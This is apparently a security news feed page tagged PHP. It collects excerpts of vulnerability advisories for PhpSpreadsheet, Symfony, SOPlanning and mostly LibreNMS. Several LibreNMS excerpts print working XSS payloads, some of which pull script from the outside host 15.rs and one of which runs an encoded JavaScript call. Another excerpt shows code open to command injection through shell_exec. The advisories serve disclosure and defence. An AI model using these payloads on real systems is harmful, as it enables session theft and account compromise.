Security
Headlines
HeadlinesLatestCVEs

Tag

#php

GHSA-jw4x-v69f-hh5w: XmlScanner bypass leads to XXE

### Summary The [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks. However, the regexes used in the `scan` method and the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method can be bypassed by using UCS-4 and encoding guessing as described in <https://www.w3.org/TR/xml/#sec-guessing-no-ext-info>. ### Details The `scan` method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the [`toUtf8` method](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner....

ghsa
#vulnerability#web#js#git#php
Debian Security Advisory 5813-1

Debian Linux Security Advisory 5813-1 - Moritz Rauch discovered that the Symfony PHP framework implemented persisted remember-me cookies incorrectly, which could result in authentication bypass.

SOPlanning 1.52.01 Remote Code Execution

SOPlanning version 1.52.01 authenticated remote code execution exploit.

Qualys released QScanner – a console vulnerability scanner for container images

Qualys released QScanner – a console vulnerability scanner for container images. Feed it an image and get a list of vulnerabilities (a la Trivy). It supports: “Local Runtimes: Scan images from Docker, Containerd, or Podman.Local Archives: Analyze Docker images or OCI layouts from local files.Remote Registries: Connect to AWS ECR, Azure Container Registry, JFrog, GHCR, […]

GHSA-8fh4-942r-jf2g: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/services.inc.php

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Services" tab of the Device page allows authenticated users to inject arbitrary JavaScript through the "descr" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions. ### Details When creating a device through the "edit device -> services" workflow (example path: "/device/15/edit/section=services"), the attacker can inject an XSS payload in the "descr" parameter. This payload is reflected in the "Services" tab of the device (URL: "/device/15/services"). It is important to note that the vulnerability does not exist when creating devices through the normal "Add Service" interface (created through the ajax_form.php request with the "type=create-service"). The payload used to exploit this vulnerability is: ```Descr'"><script/src=//15.rs></script>``` ...

GHSA-x645-6pf9-xwxw: LibreNMS has an Authenticated OS Command Injection

### Summary An authenticated attacker can create dangerous directory names on the system and alter sensitive configuration parameters through the web portal. Those two defects combined then allows to inject arbitrary OS commands inside `shell_exec()` calls, thus achieving arbitrary code execution. ### Details #### OS Command Injection We start by inspecting the file `app/Http/Controllers/AboutController.php`, more particularly the index() method which is executed upon simply visiting the /about page: ```php public function index(Request $request) { $version = Version::get(); return view('about.index', [ <TRUNCATED> 'version_webserver' => $request->server('SERVER_SOFTWARE'), 'version_rrdtool' => Rrd::version(), 'version_netsnmp' => str_replace('version: ', '', rtrim(shell_exec(Config::get('snmpget', 'snmpget') . ' -V 2>&1'))), <TRUNCATED> ]); } ``` We can see that the `version_netsnmp` key re...

GHSA-gv4m-f6fx-859x: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/print-customoid.php

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Custom OID" tab of a device allows authenticated users to inject arbitrary JavaScript through the "unit" parameter when creating a new OID. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions. ### Details When creating a new OID for a device, an attacker can inject an XSS payload into the "unit" parameter. This payload is reflected in the "Unit" column of the table displayed in the "Custom OID" tab of the device. The payload used to exploit this vulnerability is: ```<script/src=//15.rs>``` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The vulnerability is due to improper sanitization of the "unit" parameter before rendering it i...

GHSA-28p7-f6h6-3jh3: LibreNMS has a Reflected XSS ('Cross-site Scripting') in librenms/includes/html/pages/wireless.inc.php

### Summary A Reflected Cross-Site Scripting (XSS) vulnerability in the "metric" parameter of the "/wireless" and "/health" endpoints allows attackers to inject arbitrary JavaScript. This vulnerability results in the execution of malicious code when a user accesses the page with a malicious "metric" parameter, potentially compromising their session and allowing unauthorized actions. ### Details The "/wireless" and "/health" endpoints are vulnerable to reflected XSS in the "metric" parameter. An attacker can inject the following XSS payload into the "metric" parameter: ```<script>constructor['constructor'](atob('Y29uZmlybShkb2N1bWVudC5kb21haW4p'))();<!---->``` When the page is loaded with this malicious parameter, the script executes immediately. The vulnerability occurs due to improper sanitization of the "metric" parameter in the following sinks: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/wireless.inc.php#L82 https://github...

GHSA-p66q-ppwr-q5j8: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/dev-overview-data.inc.php

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the Device Overview page allows authenticated users to inject arbitrary JavaScript through the "overwrite_ip" parameter when editing a device. This vulnerability results in the execution of malicious code when the device overview page is visited, potentially compromising the accounts of other users. ### Details The vulnerability occurs when editing a device. An attacker can inject arbitrary JavaScript into the "overwrite_ip" parameter. This malicious script is then executed in the "Assigned IP" field when the device overview page is loaded. The payload used to exploit this vulnerability is: `test'"><script src=//15.rs></script>` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The root cause of this vulnerability is the application's failure to p...

GHSA-7663-37rg-c377: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the "descr" parameter when editing a device's port settings. This vulnerability can lead to the execution of malicious code when the "Port Settings" page is visited, potentially compromising the user's session and allowing unauthorized actions. ### Details When editing a device's port settings, an attacker can inject the following XSS payload into the "descr" parameter: ```lo'"><script/src=//15.rs>``` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The payload triggers when the "Port Settings" page is visited, exploiting the `$port->ifAlias` variable in the application. The sink is located here: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345f...